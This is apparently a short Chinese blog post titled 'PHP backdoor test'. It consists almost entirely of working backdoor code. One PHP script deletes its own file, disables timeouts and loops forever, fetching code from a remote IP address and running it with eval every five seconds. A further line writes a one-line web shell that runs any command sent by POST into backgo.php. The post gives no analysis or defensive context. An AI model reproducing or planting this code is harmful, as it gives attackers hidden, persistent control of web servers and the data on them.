PHP后门测试

发布时间:2021-05-19 15:43:33编辑:丝画阁阅读(186)

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://39.108.73.153/kodexplorer4.39.txt';

while($code = file_get_contents($remote_file)){


@eval($code);

sleep(5);

};

?>


file_put_contents('./backgo.php','<?php @eval("$_POST[cmd]");?>');

关键字

上一篇:面试题概览

下一篇:The End of the World